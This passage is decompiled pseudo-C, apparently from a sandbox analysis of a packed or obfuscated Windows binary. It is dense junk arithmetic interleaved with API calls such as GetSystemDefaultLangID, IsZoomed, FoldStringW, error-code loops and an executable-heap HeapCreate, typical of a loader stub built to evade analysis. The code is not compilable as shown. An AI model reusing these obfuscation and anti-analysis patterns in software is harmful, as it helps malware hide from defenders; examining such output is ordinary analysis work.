							__eflags = M01000CB0 - _t2714; // 0x0
							 *0x1000c88 = ( *(_t2796 - 0xa) & 0x000000ff) + ( *0x1000c9b & 0x000000ff) + 0x1fb15881 ^  !( *(_t2796 - 0x1c)) - _t2242 -  *0x1000ca8;
							 *0x1000c8c = 0 ^ _t2691;
							_t2694 = (0 | __eflags == 0x00000000) -  *0x1000cd2;
							__eflags = _t2694;
							 *(_t2796 - 9) = _t2694;
						}
					} else {
						if(__eflags < 0) {
							L35:
							 *(_t2796 - 0x7c) =  *0x1000cd0;
							_t2248 =  *0x1000d10; // 0x0
							 *0x1000cd2 =  *0x1000cd2 - _t2248;
							 *(_t2796 - 0x2c) = ( *(_t2796 - 0x2c) & 0x0000ffff) * ( *(_t2796 - 0x18) & 0x0000ffff);
						} else {
							__eflags = _t1793 - _t1083;
							if(_t1793 >= _t1083) {
								goto L36;
							} else {
								goto L35;
							}
						}
					}
				} else {
					_t2792 = 0x178;
					do {
						 *(_t2796 - 0xbc) = _t2714;
						if( *(_t2796 - 0x90) != 0) {
							_t2250 = 0;
							__eflags = 0;
						} else {
							_t2250 = 1;
						}
						 *(_t2796 - 8) =  *(_t2796 - 0x78) *  *(_t2796 - 0xa) - _t2250 + 0xe;
						 *(_t2796 - 2) = ( *(_t2796 - 2) & 0x000000ff) *  *(_t2796 - 0x4c);
						 *0x1000cc8 =  *0x1215420;
						 *0x1000ccc = _t2714;
						 *(_t2796 - 0xa) =  *(_t2796 - 0xa) + 1;
						_t2792 = _t2792 - 1;
					} while (_t2792 > _t2714);
				}
				 *(_t2796 - 7) = E00EC1700();
				if((0 |  *(_t2796 - 7) == 0x00000000) != (0 |  *(_t2796 - 7) == 0x00000008)) {
					 *0x1000d18 =  *0x1000d18 +  *(_t2796 - 0x70);
					asm("adc [0x1000d1c], edi");
				}
				_t1799 =  *0x1000cc0; // 0xffff970a
				_t2287 =  *0x1000cc4; // 0xffffffff
				 *(_t2796 - 0xa4) = 0x89cf - ( *(_t2796 - 0xa4) ^  *(_t2796 - 0x20)) -  *(_t2796 - 0x20) -  *(_t2796 - 0x14);
				 *(_t2796 - 0x14) =  *0x1215420;
				 *0x1000c8c = _t2287 >> 3;
				 *0x1000c88 = (_t2287 << 0x00000020 | _t1799) >> 3;
				asm("sbb edx, edx");
				 *0x1000cec =  ~(( *0x1000c98 & 0x0000ffff) *  *0x1000d20) + 1 - ( !(( *(_t2796 - 2) & 0x000000ff) -  *(_t2796 - 0xa0)) ^  *(_t2796 - 0xf) & 0x000000ff) - M01000CB0 -  *0x1000cf8;
				 *(_t2796 - 0xa4) =  *(_t2796 - 0x14) + 0xe2c6;
				_t1808 =  *0x1215420;
				 *0x1000c9c = _t1808;
				 *0x1000cd0 = _t1808;
				_t1809 =  *0x1000cf0; // -2
				 *0x1000cdc = 2;
				_t1096 = 2 - _t2714;
				 *(_t2796 - 0x20) =  *(_t2796 - 0x14) + 0x97e5;
				 *(_t2796 - 4) = _t1809;
				 *(_t2796 - 1) = 0x76;
				if(2 == 0) {
					 *(_t2796 - 2) =  *(_t2796 - 2) + 2 *  *0x1000cc8;
					_t1099 = M01000CB0; // 0x0
					_t2301 =  *(_t2796 - 0x58);
					_t1100 = E00ECEE50(_t2301,  *(_t2796 - 0x54), _t1099, 0);
					__eflags = _t1100 | _t2301;
					 *0x1000cf4 = _t2714;
					 *0x1000cf0 = 1;
					if((_t1100 | _t2301) != 0) {
						 *0x1000cf0 = _t2714;
					}
					__eflags =  *(_t2796 - 0x30);
					_t2305 = ((0 |  *(_t2796 - 0x30) == 0x00000000) + ( *0x1000c9b & 0x000000ff)) * ( *0x1000c9b & 0x000000ff);
					__eflags = _t2305;
					_t1103 =  *0x1000cc8; // 0x1
					 *(_t2796 - 0x90) = _t2305;
					_t2306 =  *0x1000ccc; // 0x0
					 *(_t2796 - 2) = E00FFD310(_t1103, 7, _t2306);
				} else {
					if(_t1096 == 1) {
						_t2687 =  *0x1000cd4; // 0x0
						 *(_t2796 - 0x24) = _t2687;
						 *0x1000ce8 =  *(_t2796 - 0xf) & 0x00004288;
						 *0x1000c9e = 0x4a;
					}
				}
				 *(_t2796 - 0x20) =  *(_t2796 - 0x14) + 0x2b;
				 *(_t2796 - 0xac) = ( *(_t2796 - 0xb4) |  *(_t2796 - 0xac)) - ( *(_t2796 - 0x20) * 0x0000ab8c |  *(_t2796 - 0x20) |  *(_t2796 - 0xa4)) + 0x1cf2d2;
				if((0 |  *(_t2796 - 9) != ( *0x1000ce8 & 0x0000ffff)) > (0 |  *(_t2796 - 9) != 0x00000037)) {
					 *0x1000cd8 =  *0x1000cd2 + 0xb5;
					 *0x1000d18 =  *(_t2796 - 0x70) * 0x6dd6;
					_t2317 =  *(_t2796 - 0x4c);
					 *0x1000d1c = _t2714;
					 *(_t2796 - 0x4c) =  *(_t2796 - 0x4c) - ( *(_t2796 - 0x24) & 0x0000ffff) - _t2317;
					_t170 = _t2796 - 0x70;
					 *_t170 =  *(_t2796 - 0x70) + ( *0x10ad044 & 0x0000ffff);
					__eflags =  *_t170;
				} else {
					_t1708 =  *(_t2796 - 0x40);
					_t2235 =  *(_t2796 - 0x3c);
					_t2828 = _t1708 -  *0x1000cc8; // 0x1
					if(_t2828 != 0) {
						L49:
						_t2317 = 1;
					} else {
						_t2829 = _t2235 -  *0x1000ccc; // 0x0
						if(_t2829 == 0) {
							_t2317 = 0;
							__eflags = 0;
						} else {
							goto L49;
						}
					}
					_t2236 =  *(_t2796 - 0x3c);
					if( *(_t2796 - 0x40) != 0x49 || _t2236 != _t2714) {
						_t1710 = 1;
					} else {
						_t1710 = 0;
						__eflags = 0;
					}
					if(_t2317 == _t1710) {
						_t2238 =  *(_t2796 - 5) +  *0x1000d18;
						_t1711 =  *(_t2796 - 5);
						_t2317 = _t1711 * _t2238 >> 0x20;
						 *(_t2796 - 5) = _t1711 * _t2238;
						asm("sbb ecx, [0x1000d1c]");
						asm("sbb ecx, [ebp-0x34]");
						 *(_t2796 - 0x38) =  *(_t2796 - 0x38) -  *0x1000d18 -  *(_t2796 - 0x38);
					}
				}
				_t1114 =  *0x1000c9e;
				_t1827 =  *(_t2796 - 0x48);
				asm("cdq");
				_t2833 = _t2317 -  *(_t2796 - 0x44);
				if(_t2833 < 0 || _t2833 <= 0 && _t1114 < _t1827) {
					_t1115 = 0;
					__eflags = 0;
				} else {
					_t1115 = 1;
				}
				if(_t1115 < (0 |  *0x1000c9e - 0x00000019 >= 0x00000000)) {
					asm("cdq");
					 *0x1000d10 =  *0x1000d10 -  *0x10b67f4;
					 *0x1000cc0 = _t2714;
					asm("sbb [0x1000d14], edx");
					_t2685 =  *(_t2796 - 0x84) ^ 0x0000c91a;
					asm("cdq");
					 *0x1000d04 = _t2685;
					 *0x1000ca8 =  *0x1000ca8 +  *(_t2796 - 0x58);
					 *0x1000cc4 = _t2714;
					 *0x1000d00 = _t2685 & 0x0000ffff;
					asm("adc [0x1000cac], edx");
				}
				 *(_t2796 - 0x14) =  *0x1215420;
				_t1118 = GetSystemDefaultLangID() & 0x0000ffff;
				 *0x1000cdc = _t1118;
				if(_t1118 != _t2714) {
					 *(_t2796 - 6) = 0;
					_t2838 =  *0x1000cec - _t2714; // 0x9b7c
					 *0x1000ca8 = ( *(_t2796 - 0xd) & 0x000000ff &  *(_t2796 - 0x7c) ^  *(_t2796 - 5) & 0x000000ff ^  *(_t2796 - 1) & 0x000000ff) * (( *(_t2796 - 0xa) & 0x000000ff ^ (0 | _t2838 == 0x00000000)) - ( *(_t2796 - 0xc) & 0x000000ff) * ( *0x1000cf8 & 0x0000ffff));
					_t2679 =  *0x1000cec; // 0x9b7c
					_t1702 =  *0x1000c9c; // 0xd4
					 *0x1000ce8 =  *0x1000ce8 - (_t2679 ^  *0x1000ce8);
					 *0x1000cac = _t2714;
					 *0x1000c9c = (_t1702 - ( *(_t2796 - 1) & 0x000000ff)) * _t1702;
					if(( *(_t2796 - 6) & 0x000000ff) == 0) {
						asm("cdq");
						 *0x1000c9f = 0x38;
						 *(_t2796 - 0x40) =  *(_t2796 - 0x40) -  *0x1000cd0;
						asm("sbb [ebp-0x3c], edx");
						 *0x1000cb4 = 0x91a4;
					}
				}
				 *(_t2796 - 0xb4) =  *(_t2796 - 0x14) + 0x3ec;
				 *(_t2796 - 0xac) =  *(_t2796 - 0x14) + 0x314;
				 *0x1000cb4 =  *(_t2796 - 0x40);
				_t1833 =  *0x1000d08; // 0xd72e
				 *0x1000c9b =  *(_t2796 - 0xb);
				 *(_t2796 - 0xd) = ( *(_t2796 - 0xd) & 0x000000ff) * _t1833;
				 *(_t2796 - 8) =  *(_t2796 - 0x1c) * 0x50;
				 *(_t2796 - 0x20) =  *(_t2796 - 0x14) + 0xcc;
				_t2323 =  *0x1000cb8; // 0x4
				_t1126 =  *0x1000cbc; // 0x0
				_t2324 = _t2323 + 0x16;
				asm("adc eax, edi");
				 *0x1000ce8 =  ~( *(_t2796 - 0x80));
				 *0x1000d04 = _t1126;
				_t1837 =  *0x1000d18; // 0x0
				 *0x1000d00 = _t2324;
				asm("cdq");
				_t1128 =  *0x1000d1c; // 0x0
				asm("sbb ebx, edx");
				_t1129 = E00ECEE50(_t1837 - ( *(_t2796 - 0xa) & 0x000000ff), _t1128, _t1837, _t1128);
				 *0x1000d1c = _t2324;
				 *0x1000d18 = _t1129;
				 *0x1000c83 = 1;
				 *0x1000cec = 0x6923;
				 *((char*)(_t2796 - 0xd4)) = 0xa1;
				 *((char*)(_t2796 - 0xd3)) = 0xa2;
				 *((char*)(_t2796 - 0xd2)) = 0xa3;
				 *(_t2796 - 0x84) = 0x30;
				 *(_t2796 - 5) =  *0x1000c9f >> 2;
				do {
					_t1840 =  *0x1000cd0;
					 *0x1000cb4 = ( *(_t2796 - 3) & 0x000000ff) - 0x2e8c;
					_t2842 =  *0x1000cdc - _t1840; // 0x84521e70
					if(_t2842 > 0) {
						_t2327 =  *(_t2796 - 3) & 0x000000ff;
						_t2748 =  *0x1000cbc; // 0x0
						_t1762 =  *0x1000cb8; // 0x4
						asm("cdq");
						 *0x1000cb8 = E00ECEE50(E00ECEE50(_t2327 & 0x000000ff, _t2327, _t1762, _t2748), _t2327, _t1762, _t2748);
						_t1136 =  *0x1000d10; // 0x0
						__eflags =  *0x1000cd0; // 0x0
						 *0x1000ca4 = _t1136 -  *0x1000ca4;
						 *0x1000cbc = _t2327;
						_t2328 =  *0x1000cc8; // 0x1
						_t1144 = (( !(( *0x1000c83 & 0x000000ff) *  *0x1000d18) -  *0x1000ce8 & 0x0000ffff) - ( *(_t2796 - 1) & 0x000000ff)) * (_t2328 - (0 | __eflags == 0x00000000) *  *0x1000cd4 & 0x0000ffff);
						__eflags = _t1144;
						 *(_t2796 - 0x2c) = _t1144;
					} else {
						_t2665 =  *0x1000cb8; // 0x4
						 *(_t2796 - 0x28) = IsZoomed(_t2665);
						if( *(_t2796 - 0x28) == 0) {
							_t2218 =  *0x1000cb8; // 0x4
							if((_t2218 |  *0x1000cbc) == 0) {
								( *(_t2796 - 6) & 0x000000ff) -  *(_t2796 - 9) =  *(_t2796 - 0x7c) -  !(( *(_t2796 - 6) & 0x000000ff) -  *(_t2796 - 9) > 0);
								if( *(_t2796 - 0x7c) <  !(( *(_t2796 - 6) & 0x000000ff) -  *(_t2796 - 9) > 0)) {
									_t1693 =  *0x1000ca8; // 0x7b8b5249
									_t2224 =  *0x1000d18; // 0x0
									 *0x1000c84 =  *0x1000c84 + 1;
									M01000CB0 = _t1693 * 0xc1;
									 *(_t2796 - 5) =  *(_t2796 - 5) + _t2224;
								}
							} else {
								_t2669 = M01000CB0; // 0x0
								 *(_t2796 - 6) = _t2669 & 0x00000009;
								_t2225 =  *0x1000d20; // 0x530e
								 *(_t2796 - 0x30) = ( *(_t2796 - 0x30) & 0x0000ffff) - _t2225;
								 *(_t2796 - 0x78) = 0x4c;
								 *(_t2796 - 0x74) = 0;
							}
						}
					}
					_t1764 = ( *(_t2796 + _t2714 - 0xd4) & 0x000000ff) + 0x90;
					_t1147 = E00EC1700();
					M01000CB0 = _t1147;
					if(_t1147 == 0) {
						if( *(_t2796 - 4) == 0) {
							__eflags =  *0x1000cd8; // 0x6dc8
							if(__eflags != 0) {
								__eflags =  *(_t2796 - 2);
								if( *(_t2796 - 2) == 0) {
									 *(_t2796 - 0x5c) =  *(_t2796 - 0x5c) >>  *0x10ae584;
									 *0x1000ca8 =  *0x1000ca8 + 1;
									asm("adc [0x1000cac], edx");
									__eflags =  *(_t2796 - 0x40) |  *(_t2796 - 0x3c);
									if(( *(_t2796 - 0x40) |  *(_t2796 - 0x3c)) != 0) {
										_t1674 = 0;
										__eflags = 0;
									} else {
										_t1674 = 1;
									}
									_t2661 = (( *(_t2796 - 0xe) & 0x000000ff) + ( *(_t2796 - 5) & 0x000000ff)) * (( *0x1000c83 & 0x000000ff) -  *0x1000cd8) * (( *0x1000ce8 & 0x0000ffff) + _t1674 + 0x514aab80);
									__eflags = _t2661;
									 *(_t2796 - 0x4c) = _t2661;
								}
							}
						} else {
							 *(_t2796 - 0xbc) = 0;
							 *(_t2796 - 0xac) =  !( *(_t2796 - 3) & 0x000000ff) -  *0x1000d00 & 0x0000ffff;
							 *0x1000d20 =  *(_t2796 - 0xf) +  *(_t2796 - 0x78) &  *(_t2796 - 0xac);
							if( *(_t2796 - 0x2c) != 0) {
								_t1681 = 0;
								__eflags = 0;
							} else {
								_t1681 = 1;
							}
							 *(_t2796 - 4) =  *(_t2796 - 0x40) + _t1681;
							_t2664 =  *(_t2796 - 0xc);
							_t2216 =  *0x1000cf4; // 0x2b91c
							_t2217 =  *0x1000cf0; // 0xd43579fe
							asm("sbb eax, eax");
							 *(_t2796 - 0x70) =  ~(_t2664 & 0x000000ff ^ M01000CB0) + 1;
							asm("cdq");
							 *0x1000d18 = E00ECEE50( *0x1000c83 & 0x000000ff, _t2664, _t2217, _t2216);
							_t1688 =  *0x1000c88; // 0xa666078f
							 *0x1000d1c = _t2664;
							 *(_t2796 - 0x88) =  *(_t2796 - 0x88) + _t1688 + 0xbe075b36;
						}
					}
					_t2334 =  *(_t2796 - 0x20);
					 *((short*)(_t2796 + _t2714 * 2 - 0x150)) = ( *(_t2796 - 0x20) +  *(_t2796 - 0xb4)) * _t2334 * 0x3a4 + (_t1764 & 0x000000ff) + 0x7180;
					_t2714 = _t2714 + 1;
				} while (_t2714 < 3);
				_t1150 = E00EC1700();
				asm("cdq");
				 *0x1000ca8 = _t1150;
				 *0x1000cac = _t2334;
				if((_t1150 | _t2334) == 0 || _t1150 != 5 || _t2334 != 0) {
					_t2334 =  *(_t2796 - 0x60);
					if(_t2334 >  !( *(_t2796 - 0x88))) {
						_t2196 =  *0x1000d00; // 0xfffff835
						asm("cdq");
						_t1660 =  *0x1000d04; // 0xffffffff
						asm("sbb edi, edx");
						 *0x1000d04 = _t1660 | _t1660;
						 *0x1000d00 = _t2196 | _t2196 -  *(_t2796 - 7);
						if(( *(_t2796 - 0x78) ^  *0x1000c88 |  *(_t2796 - 0x74) ^  *0x1000c8c) != 0) {
							_t1665 = 0;
							__eflags = 0;
						} else {
							_t1665 = 1;
						}
						 *0x1000d20 =  !( !( *(_t2796 - 8) & 0x000000ff) * _t1665) + ( *(_t2796 - 3) & 0x000000ff);
						 *(_t2796 - 0x7c) =  *(_t2796 - 0x7c) - ( *(_t2796 - 0x7c) &  *0x1000c9a);
						_t1668 =  *0x1000cc0; // 0xffff970a
						_t2202 =  *0x1000cc4; // 0xffffffff
						_t2334 =  *0x1215420;
						 *(_t2796 - 0x40) = _t1668 + 0xffffff1b;
						asm("adc ecx, 0xffffffff");
						 *(_t2796 - 0x3c) = _t2202;
						 *(_t2796 - 0x68) = _t2334;
						 *(_t2796 - 0x64) = 0;
					}
				}
				 *((short*)(_t2796 - 0x14a)) = 0;
				_t1153 = E00EC1700();
				asm("cdq");
				 *(_t2796 - 0x68) = _t1153;
				 *(_t2796 - 0x64) = _t2334;
				if(( *(_t2796 - 0x68) |  *(_t2796 - 0x64)) == 0) {
					 *(_t2796 - 4) = ( *(_t2796 - 9) & 0x000000ff) + 0x26268ad6;
					_t2648 =  *(_t2796 - 0x80);
					asm("cdq");
					 *0x1000ca8 =  *0x1000ca8 + E00ECEE50(_t2648 & 0x0000ffff, _t2648, 0xb4ace0f7, 0x43a22);
					_t1657 = M01000CB0; // 0x0
					asm("adc [0x1000cac], edx");
					 *0x11302b8 = _t1657;
					asm("cdq");
					 *0x1000cbc = _t2648;
					_t2649 =  *0x1000ce8; // 0x4
					 *0x1000cb8 =  *0x1000c9b & 0x000000ff;
					 *(_t2796 - 0xd) = ( *(_t2796 - 0xd) & 0x000000ff) + _t2649;
				}
				asm("sbb eax, eax");
				_t2335 =  *(_t2796 - 9);
				if( ~( *0x1000c9b & 0x000000ff) == _t2335) {
					__eflags =  *(_t2796 - 4) - 0x27dc2ea9;
					if( *(_t2796 - 4) > 0x27dc2ea9) {
						 *(_t2796 - 0xe) = ( *0x1000cec & 0x0000ffff) - ( *(_t2796 - 0xe) == 0);
						_t2340 =  *(_t2796 - 8) & 0x000000ff;
						__eflags = ( *0x1000cec & 0x0000ffff) - ( *(_t2796 - 0xe) == 0) > 0 - _t2340;
						if(( *0x1000cec & 0x0000ffff) - ( *(_t2796 - 0xe) == 0) > 0 == _t2340) {
							__eflags =  *(_t2796 - 0xa);
							if( *(_t2796 - 0xa) != 0) {
								 *(_t2796 - 0xc) =  *0x1215420 & 0x000000ff;
								__eflags =  *(_t2796 - 1) & 0x000000ff;
								 *(_t2796 - 7) =  !(((0 | ( *(_t2796 - 1) & 0x000000ff) == 0x00000000) + ( *(_t2796 - 0x1c) & 0x0000ffff)) * ( *(_t2796 - 8) & 0x000000ff)) - ( *(_t2796 - 3) & 0x000000ff) -  *(_t2796 - 0x6c) + ( *(_t2796 - 0x5c) & 0x0000ffff);
								asm("cdq");
								 *(_t2796 - 0x58) =  *(_t2796 - 0x58) - ( *0x1000cec & 0x0000ffff);
								asm("sbb [ebp-0x54], edx");
							}
						} else {
							_t1648 =  *(_t2796 - 0x5c) +  *0x1000cc0 + 0x43;
							 *0x1000c9e = _t1648;
							asm("cdq");
							 *(_t2796 - 2) =  *0x1000c9f >> 7;
							 *0x1000d00 = _t1648;
							 *0x1000d04 = _t2340;
						}
					} else {
						 *0x1000c9b =  *(_t2796 - 0x5c) >> 1;
						 *0x1000c94 =  *0x10bd9dc;
					}
				} else {
					_t1653 = E00EC1000();
					asm("cdq");
					 *0x1000c88 = _t1653 & 0x000000ff;
					 *0x1000c8c = _t2335;
				}
				_t2342 = _t2796 - 0x150;
				FoldStringW(0x80, _t2342, 2, _t2796 - 0xa10, 0x400);
				_t1164 =  *0x1000c94; // 0x0
				asm("sbb edx, edx");
				asm("sbb eax, eax");
				if( ~_t2342 ==  ~_t1164) {
					__eflags =  *0x1000c9f;
					if( *0x1000c9f != 0) {
						_t2636 =  *(_t2796 - 0xc);
						_t1630 =  *(_t2796 - 0xd) + (_t2636 & 0x000000ff);
						__eflags = _t1630;
						asm("cdq");
						 *0x1000d00 = _t1630;
						 *0x1000d04 = _t2636; // executed
					}
					goto L112;
				} else {
					_t1632 = E00EC1190() & 0x000000ff;
					 *0x1000cd4 = _t1632;
					if(_t1632 <= 0) {
						L112:
						__imp__CoUninitialize(); // executed
					} else {
						 *0x1000cf0 =  *0x1000cf0 +  *(_t2796 - 0x70) * 0xfa62;
						_t2638 =  *0x1000ce8 & 0x0000ffff;
						asm("adc dword [0x1000cf4], 0x0");
						asm("cdq");
						asm("cdq");
						asm("adc edx, ebx");
						 *0x1000cb8 =  *(_t2796 - 0x5c) +  *(_t2796 - 0xa0) ^  *(_t2796 - 0x24) * _t2638;
						 *0x1000cbc = _t2638 ^ _t2638;
						__imp__CoUninitialize();
					}
				}
				_t1765 = 0;
				_t1861 =  *0x1000cc0; // 0x970a
				 *0x1000ca0 =  *0x1000ca0 + 1;
				 *0x1000c98 = 4;
				_t1168 =  *0x1000c98 & 0x0000ffff;
				 *0x1000d20 = _t1861;
				 *(_t2796 - 0xe) = ( *(_t2796 - 0xe) & 0x000000ff) -  *0x10ae260;
				if(_t1168 <= 4) {
					switch( *((intOrPtr*)(_t1168 * 4 +  &M00EC7898))) {
						case 0:
							 *(_t2796 - 0x30) =  *(_t2796 - 0x30) +  *0x1000d10;
							 *0x1000cb4 = ( *(_t2796 - 0x18) & 0x0000ffff) * 0x4c87d2ee;
							goto L124;
						case 1:
							 *0x1000c9f =  *0x1000c9f + 0x91;
							__eax = __eax | 0xffffffff;
							 *0x1000ca0 =  *0x1000c9f + 0x91;
							 *((intOrPtr*)(__ebp - 0x68)) =  *((intOrPtr*)(__ebp - 0x68)) + __eax;
							asm("adc [ebp-0x64], eax");
							__edx =  *(__ebp - 0x70);
							__ecx =  *(__ebp - 0x48);
							__esi =  *(__ebp - 0x44);
							__eax = 0;
							__edx =  *(__ebp - 0x70) +  *(__ebp - 0x48);
							 *(__ebp - 0x48) =  *(__ebp - 0x70) +  *(__ebp - 0x48);
							asm("adc eax, esi");
							 *(__ebp - 0x44) = 0;
							 *(__ebp - 5) & 0x000000ff = ( *(__ebp - 5) & 0x000000ff) + 0x5c4b70c7;
							 *(__ebp - 6) = __dl;
							goto L124;
						case 2:
							 *0x1000cc0 =  *0x1000cc0 -  *0x1000d18;
							__edx =  *0x1000cc4; // 0xffffffff
							asm("sbb edx, [0x1000d1c]");
							__eax =  *(__ebp - 0x48);
							__esi =  *(__ebp - 0x44);
							__eax =  *(__ebp - 0x48) +  *0x1000cc0 -  *0x1000d18;
							asm("adc esi, edx");
							__eax =  *(__ebp - 0x48) +  *0x1000cc0 -  *0x1000d18 |  *(__ebp - 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__esi = 0;
								__eflags = 0;
							} else {
								_t356 = __eax + 1; // 0x4ab9e449
								__esi = _t356;
							}
							__eax =  *(__ebp - 1) & 0x000000ff;
							__ecx = __al;
							__edx = 0;
							0x671b87b8 = 0x671b87b8 - __al;
							__ecx =  *0x1000ca0; // 0x5247
							__eflags = __ecx - __ebx;
							__edx = 0 | __ecx == __ebx;
							(0x671b87b8 - __al) * __edx = (0x671b87b8 - __al) * __edx * __ecx;
							__eax = (0x671b87b8 - __al) * __edx * __ecx - __esi;
							asm("cdq");
							 *0x1000cc8 = (0x671b87b8 - __al) * __edx * __ecx - __esi;
							__eax =  *(__ebp - 0xa) & 0x000000ff;
							__ecx =  *(__ebp - 6) & 0x000000ff;
							__eax = ( *(__ebp - 0xa) & 0x000000ff) - 0x96;
							__eax = ( *(__ebp - 0xa) & 0x000000ff) - 0x00000096 |  *(__ebp - 6) & 0x000000ff;
							 *0x1000ccc = __edx;
							 *(__ebp - 6) = __al;
							__dl = 0xa6;
							__edx = __eax * 0xa6 >> 0x20;
							__eax = __eax * 0xa6;
							 *0x1000cd2 = __al;
							0xffffb1b4 = 0xffffb1b4 -  *0x1000ca8;
							__ecx = 0xffffffff;
							asm("sbb ecx, [0x1000cac]");
							 *((intOrPtr*)(__ebp - 0x58)) =  *((intOrPtr*)(__ebp - 0x58)) + 0xffffb1b4 -  *0x1000ca8;
							asm("adc [ebp-0x54], ecx");
							goto L124;
						case 3:
							__eax =  *0x1000d04;
							__ecx =  *0x1000d00; // 0xfffff835
							__ecx = E00ECEE50(__ecx,  *0x1000d04, 2, 0);
							__eax =  *0x1000c9f;
							__esi = __edx;
							asm("cdq");
							__ecx = __ecx +  *0x1000c9f;
							asm("adc esi, edx");
							__dl =  *(__ebp - 6);
							 *0x1000d00 = __ecx;
							__ecx = 0x188a;
							 *0x1000d04 = __edx;
							 *((short*)(__ebp - 0x80)) = (__dl & 0x000000ff) + __cx;
							goto L124;
						case 4:
							__edx =  *0x11fa040;
							 *((intOrPtr*)(__ebp - 0x2c)) =  *((intOrPtr*)(__ebp - 0x2c)) +  *0x11fa040;
							__eax =  *(__ebp - 2) & 0x000000ff;
							__cx = __al;
							__eax =  *0x1000d08 & 0x000000ff;
							__edx = 0x2243;
							__cx = __al + __dx;
							 *0x1000cf8 =  *0x1000cf8 + __cx;
							__edx = __eax *  *0x1000c9e >> 0x20;
							__eflags = __eax;
							 *0x1000c9e = __al;
							goto L124;
					}
				}
				L124:
				SetLastError(0x1d1c);
				_t2749 = 0;
				if(GetLastError() > 0) {
					do {
						 *0x1000cd4 = 1;
						 *(_t2796 - 4) =  *(_t2796 - 6) + 0x00000007 |  *(_t2796 - 4);
						 *(_t2796 - 0x84) = 0xb648;
						_t1599 =  *0x1000cd4; // 0x0
						_t1600 = _t1599 - M01000CB0;
						 *0x1000cd4 = _t1600;
						_t1602 = (_t1600 & 0x0000ffff) - _t1765;
						if(_t1602 == 0) {
							 *(_t2796 - 7) =  *(_t2796 - 7) & 0x000000e0;
							_t1604 =  *0x1000c9a & 0x000000ff;
							 *(_t2796 - 0x60) = _t1604 *  *0x1000c83 >> 0x20;
							_t2622 = ( *(_t2796 - 0x8c) & 0x0000ffff) * M01000CB0;
							__eflags = _t2622;
							 *0x1000c83 = _t1604 *  *0x1000c83;
							 *(_t2796 - 0x8c) = _t2622;
						} else {
							if(_t1602 == 1) {
								 *(_t2796 - 5) = ( *(_t2796 - 0xc) & 0x000000ff) - 0xb6;
								 *0x1135858 =  *(_t2796 - 0x7c);
								_t1624 =  *0x1000cc0; // 0xa
								 *(_t2796 - 0x90) =  *(_t2796 - 0x90) * ( *0x1000ce8 & 0x0000ffff) ^  *(_t2796 - 0x90);
								 *(_t2796 - 3) = _t1624 * 0xa1;
								asm("cdq");
								asm("sbb ebx, edx");
								 *(_t2796 - 0x68) =  *(_t2796 - 0x68) -  *0x1000c9f;
								_t1765 = 0;
							}
						}
						if(_t2749 > 0x19e) {
							 *0x1000d00 =  *0x1000d00 +  *(_t2796 - 0x40);
							_t2167 =  *0x1000d10; // 0x0
							asm("adc [0x1000d04], eax");
							 *(_t2796 - 0x2c) = _t2167 * 0xffff99cc;
							asm("cdq");
							 *(_t2796 - 0x68) =  *(_t2796 - 0x68) + E00ECEE50( *(_t2796 - 0x68),  *(_t2796 - 0x64),  *0x1000cd8,  *(_t2796 - 0x40));
							asm("adc [ebp-0x64], edx");
							_t1765 = 0;
							_t2869 =  *0x1000c94 - _t1765; // 0x0
							if(_t2869 == 0) {
								_t2170 =  *0x1000c88; // 0xa666078f
								__eflags = _t2170 |  *0x1000c8c;
								if((_t2170 |  *0x1000c8c) != 0) {
									_t2629 =  *(_t2796 - 0x28) + 0x65ae;
									 *(_t2796 - 0x1c) = _t2629;
									asm("cdq");
									 *0x1000d10 =  *(_t2796 - 0x8c) + 0x5d05665c;
									 *0x1000d14 = _t2629;
									asm("cdq");
									 *0x1000cb8 =  *0x1000cb8 +  *0x1000cd2;
									asm("adc [0x1000cbc], edx");
								}
							} else {
								_t1621 =  *0x1000d08; // 0xd72e
								 *(_t2796 - 8) = ( *(_t2796 - 8) & 0x000000ff) + _t1621;
							}
							SetLastError(_t1765);
						}
						_t1607 =  *0x1000c9a; // -110
						 *0x1000cd2 = _t1607 * 0xf;
						 *(_t2796 - 8) =  *(_t2796 - 0x48) * M01000CB0;
						_t1611 =  *0x1000c90; // 0x571c
						 *0x1000cd4 = _t1611;
						 *0x1000ce8 =  *(_t2796 - 0x48) +  *(_t2796 - 0x48) +  *(_t2796 - 0x48) +  *(_t2796 - 0x48);
						GetConsoleCP();
						_t2749 = _t2749 + 1;
					} while (_t2749 < GetLastError());
				}
				 *(_t2796 - 0x28) = 1;
				_t1862 =  *0x1000cd0; // 0x8e0000
				 *0x1000c9b =  *(_t2796 - 4) +  *0x1000cc8;
				 *(_t2796 - 0x30) = _t1862 & 0x00005d2e;
				_t1173 =  *(_t2796 - 0x28) - _t1765;
				if(_t1173 == 0) {
					_t1865 =  *(_t2796 - 0xe) +  *(_t2796 - 0x7c);
					__eflags = _t1865;
					 *(_t2796 - 0x7c) = _t1865;
					 *(_t2796 - 0x6c) = 0x9c643092;
				} else {
					if(_t1173 == 1) {
						_t2615 =  *0x1000cec; // 0x9b7c
						 *(_t2796 - 0xb) = _t2615 >> 7;
					}
				}
				_t1175 = HeapCreate(0x40000, _t1765, _t1765); // executed
				_t2750 = _t1175;
				_t1176 =  *(_t2796 - 0x48);
				 *0x1000c9e = 0xf8;
				if(_t2750 == _t1765) {
					_t2346 =  *(_t2796 - 0x44);
					__eflags =  *0x1000cdc - _t1176;
					if( *0x1000cdc == _t1176) {
						__eflags = 0 - _t2346;
						if(0 == _t2346) {
							_t2761 = 0x20a;
							do {
								 *0x1000cdc =  *0x1000cdc +  *0x112ebd0;
								asm("cdq");
								asm("adc ebx, edx");
								_t2415 =  *(_t2796 - 0x78);
								 *(_t2796 - 0x78) = E00ECEE50( *(_t2796 - 0x78) +  *0x1000d08,  *(_t2796 - 0x74), _t2415,  *(_t2796 - 0x74));
								 *(_t2796 - 0x74) = _t2415;
								_t2417 = ( *(_t2796 - 0xb) & 0x000000ff) - ( *(_t2796 - 0xc) & 0x000000ff) * 0x618d9f6;
								 *(_t2796 - 0xb) = _t2417;
								asm("cdq");
								 *0x1000cb8 = E00ECEE50(E00ECEE50( *0x1000d20, _t2417,  *0x1000cb8,  *0x1000cbc), _t2417, 0x3960af70, 0x99459);
								 *0x1000cbc = _t2417;
								 *(_t2796 - 0x6c) =  *(_t2796 - 0x6c) + 1;
								_t2761 = _t2761 - 1;
								__eflags = _t2761;
							} while (_t2761 > 0);
						}
					}
					 *(_t2796 - 0x30) = GetMessagePos();
					 *(_t2796 - 0x30) - 0x1d =  *(_t2796 - 0x30);
					__eflags = ( *(_t2796 - 0x30) != 0) - ( *(_t2796 - 0x30) != 0x1d);
